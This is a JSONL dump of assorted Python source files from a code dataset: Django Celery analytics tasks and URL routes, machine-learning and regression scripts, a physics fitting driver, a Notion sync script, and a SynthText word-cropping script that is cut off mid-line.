(s.ims[0].values().shape, s.ims[0].get_class('digit')))\n\n\nif __name__ == '__main__':\n # lib.reset_database()\n sess = lib.Session()\n sd = demo_data.SourceData('D:\\\\')\n\n ds = sd.build_arc(sess)\n\n split = ds.get_split_by_name('training')\n aux = []\n for s in tqdm(split):\n aux.append(s.ims[0].values())\n\n aux = []\n for s, gt in tqdm(ml.InMemoryDataset('arc', 'training', lambda x, y: (x, y), mode=ml.ModelMode.Train)):\n aux.append(s.ims[0].values())\n","sub_path":"tutorials/loading_benchmark.py","file_name":"loading_benchmark.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"320719587","text":"from __future__ import absolute_import\n\nfrom datetime import datetime\nfrom celery import task\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom .models import BlockMetricData, BlockMetricDataRaw\n\nto_compute_fast = set()\nto_compute_slow = set()\n\n@task\ndef write_raw_block_metric(story_id, block_id, user_id, seconds):\n global to_compute_fast\n global to_compute_slow\n\n # TODO: Consider batching into chunks of 100 writes at a time\n new_data = BlockMetricDataRaw.objects.create(\n story_id=story_id,\n block_id=block_id,\n user_id=user_id,\n seconds=seconds\n )\n new_data.save()\n\n to_compute_slow.add(story_id)\n to_compute_fast.add(story_id)\n return\n\n\n@task\ndef compute_story_blocks(quick):\n global to_compute_slow\n global to_compute_fast\n story_ids = None\n\n if quick:\n story_ids = set(to_compute_fast)\n to_compute_fast = set()\n for story_id in story_ids:\n compute_story_block_metrics_quick.delay(story_id)\n else:\n story_ids = set(to_compute_slow)\n to_compute_slow = set()\n for story_id in story_ids:\n compute_story_block_metrics.delay(story_id)\n return\n\n\n@task\ndef compute_story_block_metrics(story_id):\n \"\"\"\n Get all blocks on a story and compute accurate metrics\n Run sporadically\n \"\"\"\n raw_block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id)\n block_ids = set([data.block_id for data in raw_block_metrics])\n\n for block_id in block_ids:\n all_block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id, block_id=block_id)\n total_time = sum([data.seconds for data in all_block_metrics])\n unique_users = set([data.user_id for data in all_block_metrics])\n average_time = float(total_time) / len(unique_users)\n\n try:\n existing_metric = BlockMetricData.objects.get(story_id=story_id, block_id=block_id)\n existing_metric.average_time = average_time\n existing_metric.total_time = total_time\n existing_metric.unique_views = len(unique_users)\n\n # Total_views needs to be figure out still\n existing_metric.total_views = len(unique_users)\n existing_metric.updated = datetime.now()\n existing_metric.save()\n\n except ObjectDoesNotExist:\n new_metric = BlockMetricData.objects.create(\n story_id = story_id,\n block_id = block_id,\n average_time = average_time,\n total_time = total_time,\n unique_views = len(unique_users)\n )\n new_metric.save()\n return\n\n\n@task\ndef compute_story_block_metrics_quick(story_id):\n \"\"\"\n Get only the new blocks, some metrics like unique users and average time might be innacurate\n Run frequently\n \"\"\"\n raw_block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id)\n block_ids = set([data.block_id for data in raw_block_metrics])\n\n for block_id in block_ids:\n updated_time = datetime.now()\n try:\n metric=BlockMetricData.objects.get(story_id=story_id, block_id=block_id)\n total_time_old = metric.get('total_time', 0)\n average_time_old = metric.get('average_time', 0.0)\n unique_users_old = metric.get('unique_users', 0)\n\n except ObjectDoesNotExist:\n metric=None\n total_time_old = 0\n average_time_old = 0.0\n unique_users_old = 0\n\n if metric:\n last_update = metric.updated\n block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id, block_id=block_id, timestamp__gte=last_update)\n else:\n block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id, block_id=block_id)\n\n total_time_new = sum([data.seconds for data in all_block_metrics])\n total_time = total_time_new + total_time_old\n\n unique_users_new = len(set([data.user_id for data in all_block_metrics]))\n unique_users = unique_users_new + unique_users_old\n\n percent_new = float(unique_users_new) / unique_users\n average_time_new = float(total_time_new) / unique_users_new\n average_time = (average_time_new * percent_new) + (average_time_old * (1.0-percent_new))\n\n if metric:\n metric.average_time = average_time\n metric.total_time = total_time\n metric.unique_views = unique_users\n metric.updated = update_time\n else:\n metric = BlockMetricData.objects.create(\n story_id = story_id,\n block_id = block_id,\n average_time = average_time,\n total_time = total_time,\n unique_views = unique_users,\n updated = updated_time\n )\n metric.save()\n return\n","sub_path":"block_analytics/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"155664750","text":"from django.conf.urls import url\nfrom cms import views\nfrom cms.views import ContactDetailView\n\nurlpatterns = [\n # 連絡先\n # url(r'^contact/$', views.index, name='index'),\n url(r'^contact/$', views.contact_list, name='contact_list'), # 一覧\n url(r'^contact/add/$', views.contact_edit, name='contact_add'), # 登録\n url(r'^contact/mod/(?P\\d+)/$', views.contact_edit, name='contact_mod'), # 修正\n url(r'^contact/del/(?P\\d+)/$', views.contact_del, name='contact_del'), # 削除\n url(r'^contact/detail/(?P\\d+)/$', views.contact_detail, name='contact_detail'), # 削除\n\n # url(r'^(?P\\d+)$', MyDetailView.as_view()),\n # url(r'^(?P[-\\w]+)/$', ContactDetailView.as_view(), name='contact_detail'),\n # url(r'^detail/(?P[0-9]+)/$', views.ContactDetailView.as_view(), name='detail'),\n url(r'(?P\\d+)/$', views.detail, name='contact_detail'),\n]\n","sub_path":"mycontacts/cms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"390649382","text":"import tarfile\nimport unittest\nfrom urllib.request import urlretrieve\n\nfrom ait.common import move_some_files_for_validation\n\n\nclass TestBuildTF(unittest.TestCase):\n def test_build_tf_data_from_image(self):\n urlretrieve(\n 'http://download.tensorflow.org/example_images/flower_photos.tgz',\n '/tmp/flower_photos.tgz')\n tar = tarfile.open('/tmp/flower_photos.tgz')\n tar.extractall('/tmp')\n move_some_files_for_validation('/tmp/flower_photos')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"aitlib/ait/cnn-unit-test/validation_data_set_create.py","file_name":"validation_data_set_create.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"497494485","text":"# author cj time:2017/12/27\r\n# 核岭回归(KRR)结合岭回归(线性最小二乘与l2范数正则化)与核技巧。\r\n# 因此它学习了由各个内核和数据引起的空间中的线性函数。\r\n# pollution 6个,pollution1 5个 ,polltion2 7个特征,1个结果\r\n\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn import linear_model\r\nimport numpy as np\r\n\r\nfrom pollution.gradient import *\r\ndata=np.loadtxt(fname='pollution1.txt')\r\nmu=np.average(data[:,0:5],axis=0)\r\nsigma=np.std(data[:,0:5],axis=0)\r\ndata[:,0:5]=Z_ScoreNormalization(data[:,0:5],mu,sigma)\r\ntem=data.copy()\r\nX_data=tem[:,0:5]\r\nX_label=tem[:,5]\r\nprint(tem)\r\n\r\nskf=KFold(n_splits=4)#4折交叉验证\r\nfor train_index,test_index in skf.split(X_data,X_label):\r\n X_trainData, X_trainLabel = X_data[train_index], X_label[train_index]#训练集的数据,训练集的结果\r\n X_testData, X_testLabel = X_data[test_index], X_label[test_index]#测试集的数据,测试集的结果\r\n # X_testLabel=np.reshape(X_testLabel,newshape=(np.size(X_testLabel),1))\r\n\r\n\r\n reg = linear_model.LinearRegression()\r\n\r\n reg.fit(X_trainData,X_trainLabel)\r\n m_test = np.size(X_testLabel) # 测试集的数量\r\n theta1=reg.coef_\r\n theta2=reg.intercept_\r\n\r\n\r\n theta=np.hstack((theta2,theta1))\r\n X_testData = np.hstack((np.ones(shape=(m_test, 1)), X_testData))\r\n\r\n print('the average cost is:', averageCost(X_testData, X_testLabel, theta))\r\n predict = np.dot(X_testData, theta)\r\n print(predict[0:10], X_testLabel[0:10])\r\n plotData(predict[0:50], X_testLabel[0:50])\r\n\r\n\r\n\r\n","sub_path":"pollution/temt1.py","file_name":"temt1.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"519139073","text":"# -*- coding: UTF-8 -*-\r\n# Public pack\r\nimport os\r\n# Private pack\r\nimport headpy.hbes.hopp as hopp\r\nimport headpy.hbes.hfit as hfit\r\nimport headpy.hfile.hpickle as hpickle\r\n\r\n# 设定初始参数 #######################################\r\nproduct_list = {}\r\nproduct_list['gmean'] = [0, 0, -0.01, 0.01]\r\nproduct_list['gsigm'] = [0, 0.0001, 0, 0.005]\r\nproduct_list['npdf1'] = [0, 100, 0, 3000]\r\nproduct_list['npdf2'] = [0, 50, 0, 3000]\r\nproduct_list['p0'] = [-1, 1, -1000, 1000]\r\nproduct_list['p1'] = [-1, 1, -1000, 1000]\r\nproduct_list['p2'] = [-1, 1, -1000, 1000]\r\nproduct_list['p3'] = [-1, 1, -1000, 1000]\r\n# 设定拟合函数变量 ######################################\r\nenergy_list = hopp.energy_list()\r\ntree = 'fit4c'\r\nread = ['real', 'omeganpw']\r\ncuts = hopp.cut()\r\ncuts['momega']['inter'] = 50\r\ncuts['momega']['cut'] = 0.15\r\ncuts['momega']['range'] = 0.15\r\ndatar = 'real'\r\ndatam = 'omeganpw'\r\nbranch = 'momega'\r\ndocuts = ['chisq', 'mpi01', 'mpi02', 'mpi03', 'momega']\r\ndoweight = 'yes'\r\ntempfolder = '/scratchfs/bes/leizh/plot/opp/ftemp'\r\nprojectname = 'fitplot'\r\nscriptname = '6.python2_fit/script/1.normal.py'\r\nos.system('mkdir %s/%s' % (tempfolder, projectname))\r\noption_list = product_list\r\nbackfunction = 'd2polynomial'\r\nsignfunction = 'evolution'\r\n#######################################################\r\nfor energy in energy_list:\r\n result = hfit.dofit_sample(energy=energy,\r\n tree=tree,\r\n read=read,\r\n cuts=cuts,\r\n datar=datar,\r\n datam=datam,\r\n branch=branch,\r\n docuts=docuts,\r\n doweight=doweight,\r\n tempfolder=tempfolder,\r\n projectname=projectname,\r\n scriptname=scriptname,\r\n option_list=option_list,\r\n backfunction=backfunction,\r\n signfunction=signfunction)\r\n hpickle.pkl_dump('6.python2_fit/1.normal_pkl/%1.4f.pkl' % (energy), result)\r\n","sub_path":"opp/6.python2_fit/1.1.normal_try.py","file_name":"1.1.normal_try.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"187851794","text":"\n\n##################################################################\n\n# 해당 소스파일의 저작권은 없습니다.\n# 필요하신 분들은 언제나 사용하시길 바라며, 해당 소스코드의 부족한 부분에 대해서는\n# whcl303@hanmail.net으로 언제든지 피드백 주시길 바랍니다:)\n# 소스설명 : 데이터분석(EDA 등) 후, 데이터 모델링을 위한 Main 함수 구조입니다.\n\n##################################################################\n\n# 가변길이 argument를 받을 때 *args 사용 (*만 있으면 사용가능)\n\n########################### args 리스트 ###########################\n\n# Local환경 모델\n\n#0 : Data 경로, #1 : Log File 경로, #2 : Model 결과 저장 위치\n\n# (ex, #0 : Data 경로(train), #1 : Data 경로(test), #2 : Output #3 : 모델)\n\n##################################################################\n\ndef main(*args):\n\n import pandas as pd\n import logging\n import numpy as np\n\n ##################################################################\n\n # preparations : arguments 변수 정의 및 logging 설정\n # logging level : DEBUG, INFO, WARNING, ERROR, CRITICAL\n\n data_adrress = args[0]\n log_adrress = args[1]\n model_output_adrress = args[2]\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(\"log\")\n logger.setLevel(logging.INFO)\n file_handler = logging.FileHandler(log_adrress + \"/log.log\")\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logging.basicConfig()\n\n logger.info(\"Program Start..\")\n\n ##################################################################\n\n # Frist : Read data from the directory -> rawData\n\n import read_data\n\n logger.info(\"read data start..\")\n\n rawData = read_data.read_csv(data_adrress)\n\n # 콘솔창 출력 column 확대\n pd.set_option('display.max_columns', None)\n # pd.set_option('display.max_rows', None)\n\n #print(rawData_test)\n\n logger.info(\"read data end..\")\n\n ##################################################################\n\n # Second : Preprocess data from rawData to Train & Test set\n # Step : 1.remove Outlier 2.Feature Scaling 3.Test/Train Split & Shuffle\n\n import preprocessing\n\n logger.info(\"preprocessing start..\")\n\n # Proprocess rawData according to data characteristics\n\n # step 1 : remove outlier & feature scaling (from EDA or domain Knowledge)\n\n # X (Independent variable) & Y (Dependent variable) Split\n\n preprocessing_Data_X, preprocessing_Data_Y, x_test = preprocessing.preprocessing(rawData)\n\n\n x_train = preprocessing_Data_X\n y_train = preprocessing_Data_Y\n\n # print(x_train.shape, y_train.shape)\n\n logger.info(\"preprocessing end..\")\n\n ##################################################################\n\n # Third : Build Model\n\n from sklearn.model_selection import KFold\n\n logger.info(\"build Model start..\")\n\n import knn\n import logistic_regression\n import randomforest\n import gradientboosting\n from sklearn.model_selection import KFold\n\n num_folds = 5\n num_instance = len(y_train)\n k_fold = KFold(n_splits = num_folds, shuffle=True)\n\n\n KFold(num_folds)\n x_train = x_train.values\n y_train = y_train.values.ravel()\n\n knn_model = knn.KNN_clf(10, x_train, y_train)\n logistic_model = logistic_regression.regression(x_train, y_train)\n randomforest_model = randomforest.randomforest(x_train, y_train, 20, 0)\n xgboost_model = gradientboosting.xgb(x_train, y_train, 0.01, 100)\n\n logger.info(\"build Model end..\")\n\n ##################################################################\n\n # Fourth : Test & Tuning Model\n\n logger.info(\"test start..\")\n\n from sklearn import metrics\n from sklearn.model_selection import cross_val_score\n\n y_pred_knn_model = knn_model.predict(x_train)\n print('knn_model 정확도 :', metrics.accuracy_score(y_train, y_pred_knn_model))\n print('knn_model 정확도 (K-Fold) :', np.mean(cross_val_score(knn_model, x_train, y_pred_knn_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_logistic_model = logistic_model.predict(x_train)\n print('logistic_model 정확도 :', metrics.accuracy_score(y_train, y_pred_logistic_model))\n print('logistic_model 정확도 (K-Fold) :', np.mean(cross_val_score(logistic_model, x_train, y_pred_logistic_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_randomforest_model = randomforest_model.predict(x_train)\n print('randomforest_model 정확도 :', metrics.accuracy_score(y_train, y_pred_randomforest_model))\n print('randomforest_model 정확도 (K-Fold) :', np.mean(cross_val_score(randomforest_model, x_train, y_pred_randomforest_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_xgboost_model = xgboost_model.predict(x_train)\n print(' xgboost_model 정확도 :', metrics.accuracy_score(y_train, y_pred_xgboost_model))\n print(' xgboost_model 정확도 (K-Fold) :', np.mean(cross_val_score( xgboost_model, x_train, y_pred_xgboost_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_xgboost_model_final = xgboost_model.predict(x_test)\n\n logger.info(\"test end..\")\n\n ##################################################################\n\n # Fifth : clear memory & Save Output\n\n logger.info(\"save start..\")\n\n import joblib\n joblib.dump(xgboost_model, model_output_adrress+\"./xgboost_model.pkl\")\n\n logger.info(\"save end..\")\n logger.info(\"Program End..\")\n\n\nmain(\"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Input/data.csv\", \"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Output\", \"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Model\")","sub_path":"Kaggle/kobe/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"87996188","text":"import os\nimport json\n\n\ndef read_contents_from_file(file):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, file)\n with open(file_path) as data_file:\n data = json.load(data_file)\n return data\n\n\ndef save_module_config(file, module_id, config_id, value):\n data = read_contents_from_file(file)\n for module in data['modules']:\n if module_id != module['id']:\n continue\n\n configurations = module['configurations']\n for configuration in configurations:\n if configuration['type'] is config_id:\n configuration['value'] = str(value)\n break\n break\n data = json.dumps(data, indent=2, separators=(',', ': '))\n write_contents_to_file(file, data)\n\n\ndef write_contents_to_file(file, data):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, file)\n with open(file_path, 'w') as data_file:\n data_file.write(data)\n","sub_path":"Sourcecode/MainController/file_writer.py","file_name":"file_writer.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"411323201","text":"from notion_api import NotionAPI\nfrom drive import FetchPdfNames\n\n\nDATE_FILE_PATH = './updated_date'\n\ndef main(is_debug):\n if not is_debug:\n import config\n api_key = config.API_SECRET\n database_id = config.DATABASE_ID\n driver_path = config.DRIVER_PATH\n elif is_debug:\n import config_debug\n api_key = config_debug.API_SECRET\n database_id = config_debug.DATABASE_ID\n driver_path = config_debug.DRIVER_PATH\n\n fetcher = FetchPdfNames(driver_path=driver_path)\n notion_user = NotionAPI(api_key=api_key, database_id=database_id)\n\n # main function\n if not is_debug:\n release_mode(fetcher, notion_user)\n else:\n # Do Something\n debug_mode()\n\ndef debug_mode():\n pass\n\ndef release_mode(fetcher, notion_user):\n last_updated_at = get_last_updated_date()\n pdf_infos = fetcher.get_new_pdf_infos_since(last_updated_at)\n for pdf_info in pdf_infos:\n print(pdf_info)\n notion_user.post_pdf(pdf_info)\n # 更新日をファイルに追記\n update_date_file()\n\n# 最終更新日だけ返す\ndef get_last_updated_date():\n with open(DATE_FILE_PATH) as f:\n # 全行読む\n lines = f.readlines()\n\n # 後ろから1行だけ返す\n return lines[-1]\n\ndef update_date_file():\n with open(DATE_FILE_PATH, mode='a') as f:\n f.write(f'\\n{get_today()}')\n\n# 2021/08/05 の形で ~今日の~ 日付を取得する\ndef get_today():\n import datetime\n\n dt_now = datetime.datetime.now()\n return dt_now.strftime('%Y/%m/%d')\n\n\nif __name__ == \"__main__\":\n is_debug = False # 本番用のデータ使うかどうか\n main(is_debug)\n # print(get_last_updated_date())\n # update_date_file()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"327794433","text":"from numpy import *\nfrom matplotlib.pyplot import *\n\ndef displayData(X, example_width=None):\n#DISPLAYDATA Display 2D data in a nice grid\n# display_array = DISPLAYDATA(X, example_width) displays 2D data\n# stored in X in a nice grid in the current figure. It returns\n# the displayed array.\n\n # Set example_width automatically if not passed in\n if example_width is None:\n example_width = round(sqrt(size(X, 1)))\n\n # Compute rows, cols\n m, n = shape(X)\n example_height = n / example_width\n\n # Compute number of items to display\n display_rows = int(sqrt(m))\n display_cols = (m + display_rows - 1) // display_rows\n\n # Between images padding\n pad = 1\n\n # Setup blank display\n display_array = - ones((pad + display_rows * (example_height + pad),\n pad + display_cols * (example_width + pad)))\n\n # Copy each example into a patch on the display array\n curr_ex = 0\n for j in range(display_rows):\n for i in range(display_cols):\n if curr_ex >= m:\n break\n # Copy the patch\n\n # Get the max value of the patch\n max_val = max(abs(X[curr_ex, :]))\n pos_x = pad + i * (example_width + pad)\n pos_y = pad + j * (example_height + pad)\n display_array[pos_y : pos_y + example_height, pos_x : pos_x + example_width] = \\\n reshape(X[curr_ex, :], (example_height, example_width), order='F') / max_val\n curr_ex += 1\n if curr_ex >= m:\n break\n\n # Display Image\n imshow(display_array, cmap=cm.gray)\n\n # Do not show axis\n axis('off')\n\n return display_array\n","sub_path":"machine-learning-ex3/ex3/displayData.py","file_name":"displayData.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"550502220","text":"import os\nimport numpy as np\nimport math\nimport h5py \nimport itertools\nfrom PIL import Image, ImageOps\nimport re\nimport cv2\nfrom sklearn.linear_model import LinearRegression\n\nfrom common import *\n\ndef main(db_fname):\n db = h5py.File(db_fname, 'r')\n dsets = sorted(db['data'].keys())\n print(\"total number of images : \", colorize(Color.RED, len(dsets), highlight=True))\n\n my_ch_label = open('results/my_label/1.csv', 'a')\n \n for k in dsets:\n rgb = db['data'][k][...]\n charBB = db['data'][k].attrs['charBB']\n wordBB = db['data'][k].attrs['wordBB']\n txt = db['data'][k].attrs['txt']\n\n print(\"image name : \", colorize(Color.RED, k, bold=True))\n print(\" ** no. of chars : \", colorize(Color.YELLOW, charBB.shape[-1]))\n print(\" ** no. of words : \", colorize(Color.YELLOW, wordBB.shape[-1]))\n print(\" ** text : \", colorize(Color.GREEN, txt))\n\n \"\"\"img = Image.fromarray(rgb, 'RGB')\n gray_image = ImageOps.grayscale(img)\n #img.save('results/my_label/images/'+k[:-2])\n gray_image.save('results/my_label/images/'+k[:-2])\"\"\"\n\n name_jpg = k\n chars_quantity = charBB.shape[-1]\n\n pixel_step_x = 1\n All_x_down_right_word, All_y_down_left_word, All_w_char_list, All_h_char_list, All_char_list = [], [], [], [], []\n \n all_symbols = ''\n new_txt = []\n ochered = -1\n \n for j in range(len(txt)):\n all_symbols = all_symbols + txt[j]\n all_symbols = re.sub('[(\\n) ]', '', all_symbols)\n txt_for_split = re.sub('(\\n)', ' ', txt[j])\n splitted = txt_for_split.split()\n new_txt = new_txt + splitted\n print('new_txt = ', new_txt)\n #print('charBB = ', charBB)\n for j in range(len(new_txt)): #кол-во слов\n ochered = ochered + 1\n print('номер = ', j, ' Слово = ', new_txt[j], ', кол-во букв = ', len(str(new_txt[j])),)\n i = 0\n num_ch_per_w = len(str(new_txt[j])) #кол-во букв для данного слова\n x_down_left_word = []\n y_down_left_word = []\n x_down_right_word = []\n y_down_right_word = []\n word = ''\n w_of_next_ch_word = []\n h_of_next_ch_word = []\n\n x_top_left_word, x_top_right_word, y_top_left_word, y_top_right_word = [], [], [], []\n while i < num_ch_per_w:\n i = i + 1\n\n print('Буква = ', all_symbols[ochered])\n\n x_down_left = charBB[0][3][ochered]\n y_down_left = charBB[1][3][ochered]\n x_top_left = charBB[0][0][ochered]\n y_top_left = charBB[1][0][ochered]\n x_top_right = charBB[0][1][ochered]\n y_top_right = charBB[1][1][ochered]\n x_down_right = charBB[0][2][ochered]\n y_down_right = charBB[1][2][ochered] \n\n value_of_symbol = all_symbols[ochered]\n word = word + value_of_symbol\n\n w_of_next_ch = ((x_down_right - x_down_left)**2+(y_down_right - y_down_left)**2)**0.5\n h_of_next_ch = ((x_top_right - x_down_right)**2+(y_top_right - y_down_right)**2)**0.5\n\n w_of_next_ch_word.append(int(w_of_next_ch))\n h_of_next_ch_word.append(int(h_of_next_ch))\n\n x_down_left_word.append(int(x_down_left))\n y_down_left_word.append(int(y_down_left))\n x_down_right_word.append(int(x_down_right))\n y_down_right_word.append(int(y_down_right))\n\n x_top_left_word.append(int(x_top_left))\n y_top_left_word.append(int(y_top_left))\n x_top_right_word.append(int(x_top_right))\n y_top_right_word.append(int(y_top_right))\n\n if i <= num_ch_per_w - 1:\n ochered = ochered + 1\n \n tg_alpha, b, model = lin_reg(x_down_left_word, y_down_left_word, x_down_right_word, y_down_right_word)\n \n x_down_right_word, y_down_left_word = dot_word_crop(tg_alpha, b, k, rgb, word, w_of_next_ch_word, h_of_next_ch_word, \n x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_top_left_word, y_top_right_word)\n\n db.close()\n \ndef dot_word_crop(tg_alpha, b, k, rgb, word, w_of_next_ch_word, h_of_next_ch_word, \n x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_top_left_word, y_top_right_word):\n\n y_down_right_word, y_down_left_word = [], []\n for i in x_down_left_word:\n next_y = tg_alpha * i + b\n y_down_left_word.append(next_y)\n\n for i in x_down_right_word:\n next_y = tg_alpha * i + b\n y_down_right_word.append(next_y)\n\n x_top_left, x_top_right, y_top_left, y_top_right = int(x_top_left_word[0]), int(x_top_right_word[-1]) + 3, int(y_top_left_word[0]), int(y_top_right_word[-1])\n x_down_left, x_down_right, y_down_left, y_down_right = int(x_down_left_word[0]), int(x_down_right_word[-1]) + 3, int(y_down_left_word[0]), int(y_down_right_word[-1])\n \n img = rgb\n #img = cv2.circle(img, (x_top_left, y_top_left), radius=0, color=(0, 0, 255), thickness=2)\n #img = cv2.circle(img, (x_top_right, y_top_right), radius=0, color=(0, 0, 255), thickness=2)\n #img = cv2.circle(img, (x_down_right, y_down_right), radius=0, color=(0, 0, 255), thickness=2)\n #img = cv2.circle(img, (x_down_left, y_down_left), radius=0, color=(0, 0, 255), thickness=2)\n\n h_of_word = min(h_of_next_ch_word)\n w_of_word = int(((x_down_right - x_down_left)**2+(y_down_right - y_down_left)**2)**0.5)\n\n #y_top_left, y_top_right, y_down_left, y_down_right, x_top_left, x_top_right, x_down_left, x_down_right = transform_coord(tg_alpha, word, \n # y_top_left, y_top_right, y_down_left, y_down_right, \n # x_top_left, x_top_right, x_down_left, x_down_right)\n\n h_of_word_new = h_of_word + 22\n\n pts1 = np.float32([[x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left]])\n pts2 = np.float32([[0,0],[w_of_word,0],[w_of_word,h_of_word_new],[0,h_of_word_new]])\n #pts2 = np.float32([[0,0],[w_of_word,0],[w_of_word,h_of_word],[0,h_of_word]])\n\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(img,M,(w_of_word, h_of_word_new))\n\n w_of_word_new = w_of_word * 2\n #h_of_word_new = 32\n \n #img = cv2.circle(img, (x_top_left, y_top_left), radius=0, color=(0, 255, 0), thickness=2)\n #img = cv2.circle(img, (x_top_right, y_top_right), radius=0, color=(0, 255, 0), thickness=2)\n #img = cv2.circle(img, (x_down_right, y_down_right), radius=0, color=(0, 255, 0), thickness=2)\n #img = cv2.circle(img, (x_down_left, y_down_left), radius=0, color=(0, 255, 0), thickness=2)\n cv2.imwrite(\"results/dots/{}_my.png\".format(k[:-2]),img)\n cv2.imwrite('results/my_words/{}__{}'.format(word, k[:-2]), dst)\n\n img_word = cv2.imread('results/my_words/{}__{}'.format(word, k[:-2]), 3)\n\n cv2.imwrite('results/my_words/{}__{}'.format(word, k[:-2]), img_word)\n\n coordinates, coordinates_old = apply_center_coord_transform(x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_down_right_word, y_down_left_word, y_top_left_word, y_top_right_word, \n w_of_next_ch_word, h_of_next_ch_word, M)\n img_word = cv2.hconcat((img_word, np.zeros((np.shape(img_word)[0], 32, 3), dtype=np.uint8) ))\n img_word = cv2.hconcat((np.zeros((np.shape(img_word)[0], 32, 3), dtype=np.uint8), img_word ))\n for i in coordinates:\n # Horizontal border\n \n img_word = cv2.circle(img_word, (i[0] + 32, i[1]), radius=0, color=(0, 0, 255), thickness=2)\n \n cv2.imwrite('results/my_words/{}__{}'.format(word, k[:-2]), img_word)\n\n for i in coordinates_old:\n # Horizontal border\n \n img = cv2.circle(img, (i[0], i[1]), radius=0, color=(0, 0, 255), thickness=2)\n \n cv2.imwrite(\"results/dots/{}_my.png\".format(k[:-2]),img)\n\n #dst_new = cv2.resize(dst, (w_of_word_new, h_of_word_new))\n \n return x_down_right_word, y_down_left_word\n\ndef apply_center_coord_transform(x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_down_right_word, y_down_left_word, y_top_left_word, y_top_right_word, \n w_of_next_ch_word, h_of_next_ch_word, M):\n \n \n \"\"\"print('before:', x_top_left, y_top_left)\n x_top_left, y_top_left = perspective_transform_coordinates(coordinates, M)\n print('after:', x_top_left, y_top_left)\n\n coordinates = [x_top_right, y_top_right]\n print('before:', x_top_right, y_top_right)\n x_top_right, y_top_right = perspective_transform_coordinates(coordinates, M)\n print('after:', x_top_right, y_top_right)\n\n coordinates = [x_down_left, y_down_left]\n print('before:', x_down_left, y_down_left)\n x_down_left, y_down_left = perspective_transform_coordinates(coordinates, M)\n print('after:', x_down_left, y_down_left)\n\n coordinates = [x_down_right, y_down_right]\n print('before:', x_down_right, y_down_right)\n x_down_right, y_down_right = perspective_transform_coordinates(coordinates, M)\n print('after:', x_down_right, y_down_right)\"\"\"\n coordinates = []\n coordinates_old = []\n for i in range(len(x_down_left_word)):\n\n middle_x = (x_down_left_word[i] + x_down_right_word[i] + x_top_left_word[i] + x_top_right_word[i])/4\n middle_y = (y_down_left_word[i] + y_down_right_word[i] + y_top_left_word[i] + y_top_right_word[i])/4\n coordinates_old.append((int(middle_x), int(middle_y)))\n middle_x, middle_y = perspective_transform_coordinates([middle_x, middle_y], M)\n coordinates.append((int(middle_x), int(middle_y)))\n return coordinates, coordinates_old\n\ndef transform_coord(tg_alpha, word, y_top_left, y_top_right, y_down_left, y_down_right, x_top_left, x_top_right, x_down_left, x_down_right): \n\n print('Before')\n print(word)\n print('[x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left] = ', \n [x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left])\n \n delta_b = 11\n\n if tg_alpha != 0:\n print('tg_alpha != 0:',word, tg_alpha)\n if tg_alpha < 0:\n tg_alpha = abs(tg_alpha)\n alpha = math.atan(tg_alpha)\n\n y_down_left, y_down_right = int(y_down_left + delta_b * math.cos(alpha)), int(y_down_right + delta_b * math.cos(alpha))\n x_down_left = int(x_down_left + delta_b * math.sin(alpha))\n x_down_right = int(x_down_right + delta_b * math.sin(alpha))\n\n y_top_left, y_top_right = int(y_top_left - delta_b * math.cos(alpha)), int(y_top_right - delta_b * math.cos(alpha))\n x_top_left = int(x_top_left - 